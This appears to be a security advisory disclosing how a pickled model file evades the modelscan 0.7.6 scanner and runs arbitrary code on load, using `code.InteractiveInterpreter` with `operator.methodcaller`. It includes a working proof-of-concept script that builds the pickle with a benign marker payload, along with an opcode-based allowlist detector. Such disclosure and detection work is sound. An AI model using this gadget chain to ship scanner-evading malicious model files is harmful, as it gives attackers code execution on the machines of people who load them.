license: mit
tags:
- security-research
- modelscan-bypass
# Modelscan Bypass: code.InteractiveInterpreter + operator.methodcaller
## Summary
This model file passes the ProtectAI modelscan 0.7.6 (latest) scanner clean while achieving arbitrary code execution at unpickling time. The chain uses `code.InteractiveInterpreter`, a class from the standard library `code` module, combined with `operator.methodcaller`; neither global is on modelscan's blocklist, and the pickle never references `exec()` or `compile()` directly.
## Bypass Chain
1. `code.InteractiveInterpreter()`: instantiates a Python interactive interpreter (an ordinary class with its own `locals` namespace; this is a `GLOBAL`/`STACK_GLOBAL` plus `REDUCE` in the pickle)
2. `operator.methodcaller("runsource", PAYLOAD)`: builds a callable that, given an object, invokes `.runsource(PAYLOAD)` on it (again expressed as a global plus `REDUCE`)
3. Applying that callable to the interpreter instance executes `interp.runsource(PAYLOAD)`, which compiles and runs the attacker-supplied source in the interpreter's namespace: arbitrary code execution on load
## Why It Works
- The `code` module is NOT in modelscan's `unsafe_globals` blocklist, so the `code InteractiveInterpreter` global is accepted
- `operator.methodcaller` is NOT blocked (only `operator.attrgetter` is blocked), so the method invocation is expressed without any blocked global
- `InteractiveInterpreter.runsource()` compiles the source (via `codeop.CommandCompiler`) and hands the code object to `runcode()`, which calls `exec()` in the interpreter's `locals`; the pickle itself never names `builtins.exec` or `builtins.compile`
- modelscan only matches the module/attribute pairs referenced by `GLOBAL`/`STACK_GLOBAL` opcodes against its blocklist; any pair not on the list passes, so any standard-library attribute path that reaches `exec()` indirectly defeats the check
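As an added example (not part of this write-up and not modelscan's or PyTorch's own code), the script below serves both the Bypass Chain and Why It Works sections: it serialises the chain as a pickle with a constructed, benign marker payload, lists the module/attribute pairs the stream imports without loading it, and runs the allowlist-style check that a module/function blocklist cannot provide. The `MODELSCAN_BYPASS_DEMO` marker and the `ALLOWED_GLOBALS` set are assumptions chosen for the demonstration; nothing here reproduces modelscan's own matching logic.

```python
"""Added example: build the InteractiveInterpreter + methodcaller chain as a
pickle, enumerate the globals it imports, and apply an allowlist check."""
import code
import operator
import os
import pickle
import pickletools

# Constructed, benign stand-in for an attacker payload: it only sets an
# environment variable in the loading process so the effect is observable.
MARKER_VAR = "MODELSCAN_BYPASS_DEMO"  # assumption, not from the write-up
BENIGN_PAYLOAD = f"import os; os.environ[{MARKER_VAR!r}] = 'executed'"


class _Interp:
    """Unpickles to code.InteractiveInterpreter() via a global plus REDUCE."""

    def __reduce__(self):
        return (code.InteractiveInterpreter, ())


class _Trigger:
    """Unpickles to operator.methodcaller('runsource', src)(InteractiveInterpreter()).

    The callable is a methodcaller instance; pickle serialises it through the
    methodcaller type's own __reduce__, so the stream references only
    operator.methodcaller and code.InteractiveInterpreter, never
    builtins.exec or builtins.compile.
    """

    def __init__(self, source: str):
        self.source = source

    def __reduce__(self):
        return (operator.methodcaller("runsource", self.source), (_Interp(),))


def build_chain_pickle(source: str = BENIGN_PAYLOAD, protocol: int = 4) -> bytes:
    """Serialise the chain. Protocol 4 emits STACK_GLOBAL; protocol 2 emits GLOBAL."""
    return pickle.dumps(_Trigger(source), protocol=protocol)


def imported_globals(data: bytes) -> list[tuple[str, str]]:
    """Every (module, attribute) pair the pickle imports, found without loading it.

    GLOBAL carries one "module name" text argument; STACK_GLOBAL consumes the
    two most recently pushed strings, so those are tracked as we walk the opcodes.
    """
    pairs: list[tuple[str, str]] = []
    strings: list[str] = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, _, name = arg.partition(" ")
            pairs.append((module, name))
        elif op.name == "STACK_GLOBAL":
            if len(strings) < 2:
                raise ValueError("malformed STACK_GLOBAL: fewer than two strings pushed")
            pairs.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return pairs


# Illustrative allowlist (an assumption, not modelscan's): the globals a plain
# torch/numpy checkpoint needs. Anything outside it is reported, which is the
# inverse of a blocklist and is what catches a not-yet-listed gadget like this one.
ALLOWED_GLOBALS = frozenset({
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
    ("torch", "FloatStorage"),
    ("numpy.core.multiarray", "_reconstruct"),
    ("numpy", "ndarray"),
    ("numpy", "dtype"),
})


def unexpected_globals(data: bytes, allowed=ALLOWED_GLOBALS) -> list[tuple[str, str]]:
    """Allowlist check: every import the pickle makes that is not explicitly permitted."""
    return [pair for pair in imported_globals(data) if pair not in allowed]


def load_untrusted(data: bytes):
    """Load the pickle the way pickle.load() / torch.load(weights_only=False) would.

    runsource() returns False once the source has run (and also on a syntax
    error, which it prints to stderr rather than raising), so the "model" that
    comes back is simply False and a failed payload does not abort the load.
    """
    return pickle.loads(data)


def marker_value():
    """What the benign payload left behind in this process (None if it never ran)."""
    return os.environ.get(MARKER_VAR)


if __name__ == "__main__":
    blob = build_chain_pickle()
    print("imports:", imported_globals(blob))
    print("flagged:", unexpected_globals(blob))
    print("loaded object:", load_untrusted(blob), "marker:", marker_value())
```

The opcode walk is the check worth keeping: it reports `operator.methodcaller` and `code.InteractiveInterpreter` as imports before anything is executed, and the same pairs come out whether the pickle was written with `GLOBAL` (protocol 2) or `STACK_GLOBAL` (protocol 4). Only `load_untrusted()` actually runs the payload; call it only with the benign marker source.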
## Modelscan Result
## Impact
Full arbitrary code execution on model load via `pickle.load()` or `torch.load(..., weights_only=False)`. PyTorch's `weights_only=True` mode (the default since PyTorch 2.6) uses a restricted unpickler that rejects globals outside its allowlist, so the chain does not execute there; the exposure is any loader that unpickles with the standard `Unpickler`, or that relied on modelscan's clean verdict before doing so.
## Affected
modelscan 0.7.6 (latest on PyPI as of 2026-04-10)
## Responsible Disclosure
Submitted to Huntr for ProtectAI review.